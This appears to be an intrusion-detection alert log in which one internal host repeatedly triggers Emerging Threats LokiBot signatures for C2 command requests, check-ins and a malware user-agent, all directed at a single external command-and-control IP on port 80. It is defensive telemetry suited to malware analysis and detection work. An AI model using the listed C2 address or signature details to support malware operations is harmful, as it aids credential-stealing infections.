11/25/21-10:50:38.984853	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50132	80	192.168.11.20	176.223.209.128
11/25/21-10:50:39.497980	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50133	80	192.168.11.20	176.223.209.128
11/25/21-10:50:39.497980	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50133	80	192.168.11.20	176.223.209.128
11/25/21-10:50:39.497980	TCP	2025381	ET TROJAN LokiBot Checkin	50133	80	192.168.11.20	176.223.209.128
11/25/21-10:50:39.497980	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50133	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.012551	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50134	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.012551	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50134	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.012551	TCP	2025381	ET TROJAN LokiBot Checkin	50134	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.012551	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50134	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.520116	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50135	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.520116	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50135	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.520116	TCP	2025381	ET TROJAN LokiBot Checkin	50135	80	192.168.11.20	176.223.209.128
11/25/21-10:50:40.520116	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50135	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.030705	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50136	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.030705	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50136	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.030705	TCP	2025381	ET TROJAN LokiBot Checkin	50136	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.030705	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50136	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.524484	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50137	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.524484	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50137	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.524484	TCP	2025381	ET TROJAN LokiBot Checkin	50137	80	192.168.11.20	176.223.209.128
11/25/21-10:50:41.524484	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50137	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.040785	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50138	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.040785	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50138	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.040785	TCP	2025381	ET TROJAN LokiBot Checkin	50138	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.040785	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50138	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.534729	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50139	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.534729	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50139	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.534729	TCP	2025381	ET TROJAN LokiBot Checkin	50139	80	192.168.11.20	176.223.209.128
11/25/21-10:50:42.534729	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50139	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.037329	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50140	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.037329	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50140	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.037329	TCP	2025381	ET TROJAN LokiBot Checkin	50140	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.037329	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50140	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.557051	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50141	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.557051	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50141	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.557051	TCP	2025381	ET TROJAN LokiBot Checkin	50141	80	192.168.11.20	176.223.209.128
11/25/21-10:50:43.557051	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50141	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.009708	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50142	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.009708	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50142	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.009708	TCP	2025381	ET TROJAN LokiBot Checkin	50142	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.009708	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50142	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.527358	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50143	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.527358	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50143	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.527358	TCP	2025381	ET TROJAN LokiBot Checkin	50143	80	192.168.11.20	176.223.209.128
11/25/21-10:50:44.527358	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50143	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.039531	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50144	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.039531	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50144	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.039531	TCP	2025381	ET TROJAN LokiBot Checkin	50144	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.039531	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50144	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.509964	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50145	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.509964	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50145	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.509964	TCP	2025381	ET TROJAN LokiBot Checkin	50145	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.509964	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50145	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.990994	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50146	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.990994	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50146	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.990994	TCP	2025381	ET TROJAN LokiBot Checkin	50146	80	192.168.11.20	176.223.209.128
11/25/21-10:50:45.990994	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50146	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.446020	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50147	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.446020	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50147	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.446020	TCP	2025381	ET TROJAN LokiBot Checkin	50147	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.446020	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50147	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.964294	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50148	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.964294	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50148	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.964294	TCP	2025381	ET TROJAN LokiBot Checkin	50148	80	192.168.11.20	176.223.209.128
11/25/21-10:50:46.964294	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50148	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.480203	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50149	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.480203	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50149	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.480203	TCP	2025381	ET TROJAN LokiBot Checkin	50149	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.480203	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50149	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.989430	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50150	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.989430	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50150	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.989430	TCP	2025381	ET TROJAN LokiBot Checkin	50150	80	192.168.11.20	176.223.209.128
11/25/21-10:50:47.989430	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50150	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.492018	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50151	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.492018	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50151	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.492018	TCP	2025381	ET TROJAN LokiBot Checkin	50151	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.492018	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50151	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.956654	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50152	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.956654	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50152	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.956654	TCP	2025381	ET TROJAN LokiBot Checkin	50152	80	192.168.11.20	176.223.209.128
11/25/21-10:50:48.956654	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50152	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.453055	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50153	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.453055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50153	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.453055	TCP	2025381	ET TROJAN LokiBot Checkin	50153	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.453055	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50153	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.981482	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50154	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.981482	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50154	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.981482	TCP	2025381	ET TROJAN LokiBot Checkin	50154	80	192.168.11.20	176.223.209.128
11/25/21-10:50:49.981482	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50154	80	192.168.11.20	176.223.209.128
11/25/21-10:50:50.494751	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50155	80	192.168.11.20	176.223.209.128
11/25/21-10:50:50.494751	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50155	80	192.168.11.20	176.223.209.128
11/25/21-10:50:50.494751	TCP	2025381	ET TROJAN LokiBot Checkin	50155	80	192.168.11.20	176.223.209.128
11/25/21-10:50:50.494751	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50155	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.037018	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50156	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.037018	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50156	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.037018	TCP	2025381	ET TROJAN LokiBot Checkin	50156	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.037018	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50156	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.551709	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50157	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.551709	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50157	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.551709	TCP	2025381	ET TROJAN LokiBot Checkin	50157	80	192.168.11.20	176.223.209.128
11/25/21-10:50:51.551709	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50157	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.056652	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50158	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.056652	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50158	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.056652	TCP	2025381	ET TROJAN LokiBot Checkin	50158	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.056652	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50158	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.572450	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50159	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.572450	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50159	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.572450	TCP	2025381	ET TROJAN LokiBot Checkin	50159	80	192.168.11.20	176.223.209.128
11/25/21-10:50:52.572450	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50159	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.087854	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50160	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.087854	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50160	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.087854	TCP	2025381	ET TROJAN LokiBot Checkin	50160	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.087854	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50160	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.604490	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50161	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.604490	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50161	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.604490	TCP	2025381	ET TROJAN LokiBot Checkin	50161	80	192.168.11.20	176.223.209.128
11/25/21-10:50:53.604490	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50161	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.126117	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50162	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.126117	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50162	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.126117	TCP	2025381	ET TROJAN LokiBot Checkin	50162	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.126117	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50162	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.652803	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50163	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.652803	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50163	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.652803	TCP	2025381	ET TROJAN LokiBot Checkin	50163	80	192.168.11.20	176.223.209.128
11/25/21-10:50:54.652803	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50163	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.150613	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50164	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.150613	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50164	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.150613	TCP	2025381	ET TROJAN LokiBot Checkin	50164	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.150613	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50164	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.643187	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50166	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.643187	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50166	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.643187	TCP	2025381	ET TROJAN LokiBot Checkin	50166	80	192.168.11.20	176.223.209.128
11/25/21-10:50:55.643187	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50166	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.163152	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50167	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.163152	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50167	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.163152	TCP	2025381	ET TROJAN LokiBot Checkin	50167	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.163152	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50167	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.612755	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50168	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.612755	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50168	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.612755	TCP	2025381	ET TROJAN LokiBot Checkin	50168	80	192.168.11.20	176.223.209.128
11/25/21-10:50:56.612755	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50168	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.123615	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50169	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.123615	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50169	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.123615	TCP	2025381	ET TROJAN LokiBot Checkin	50169	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.123615	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50169	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.646528	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50170	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.646528	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50170	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.646528	TCP	2025381	ET TROJAN LokiBot Checkin	50170	80	192.168.11.20	176.223.209.128
11/25/21-10:50:57.646528	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50170	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.136639	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50171	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.136639	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50171	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.136639	TCP	2025381	ET TROJAN LokiBot Checkin	50171	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.136639	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50171	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.574452	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50172	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.574452	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50172	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.574452	TCP	2025381	ET TROJAN LokiBot Checkin	50172	80	192.168.11.20	176.223.209.128
11/25/21-10:50:58.574452	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50172	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.081034	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50173	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.081034	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50173	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.081034	TCP	2025381	ET TROJAN LokiBot Checkin	50173	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.081034	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50173	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.594204	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50174	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.594204	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50174	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.594204	TCP	2025381	ET TROJAN LokiBot Checkin	50174	80	192.168.11.20	176.223.209.128
11/25/21-10:50:59.594204	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50174	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.115568	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50175	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.115568	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50175	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.115568	TCP	2025381	ET TROJAN LokiBot Checkin	50175	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.115568	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50175	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.621599	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50176	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.621599	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50176	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.621599	TCP	2025381	ET TROJAN LokiBot Checkin	50176	80	192.168.11.20	176.223.209.128
11/25/21-10:51:00.621599	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50176	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.133542	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50177	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.133542	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50177	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.133542	TCP	2025381	ET TROJAN LokiBot Checkin	50177	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.133542	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50177	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.656411	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50178	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.656411	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50178	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.656411	TCP	2025381	ET TROJAN LokiBot Checkin	50178	80	192.168.11.20	176.223.209.128
11/25/21-10:51:01.656411	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50178	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.166862	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50179	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.166862	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50179	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.166862	TCP	2025381	ET TROJAN LokiBot Checkin	50179	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.166862	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50179	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.675779	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50180	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.675779	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50180	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.675779	TCP	2025381	ET TROJAN LokiBot Checkin	50180	80	192.168.11.20	176.223.209.128
11/25/21-10:51:02.675779	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50180	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.197639	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50181	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.197639	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50181	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.197639	TCP	2025381	ET TROJAN LokiBot Checkin	50181	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.197639	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50181	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.728227	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50182	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.728227	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50182	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.728227	TCP	2025381	ET TROJAN LokiBot Checkin	50182	80	192.168.11.20	176.223.209.128
11/25/21-10:51:03.728227	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50182	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.168732	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50183	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.168732	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50183	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.168732	TCP	2025381	ET TROJAN LokiBot Checkin	50183	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.168732	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50183	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.679603	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50184	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.679603	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50184	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.679603	TCP	2025381	ET TROJAN LokiBot Checkin	50184	80	192.168.11.20	176.223.209.128
11/25/21-10:51:04.679603	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50184	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.197175	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50185	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.197175	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50185	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.197175	TCP	2025381	ET TROJAN LokiBot Checkin	50185	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.197175	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50185	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.722649	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50186	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.722649	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50186	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.722649	TCP	2025381	ET TROJAN LokiBot Checkin	50186	80	192.168.11.20	176.223.209.128
11/25/21-10:51:05.722649	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50186	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.242183	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50187	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.242183	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	50187	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.242183	TCP	2025381	ET TROJAN LokiBot Checkin	50187	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.242183	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	50187	80	192.168.11.20	176.223.209.128
11/25/21-10:51:06.737953	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	50188	80	192.168.11.20	176.223.209.128
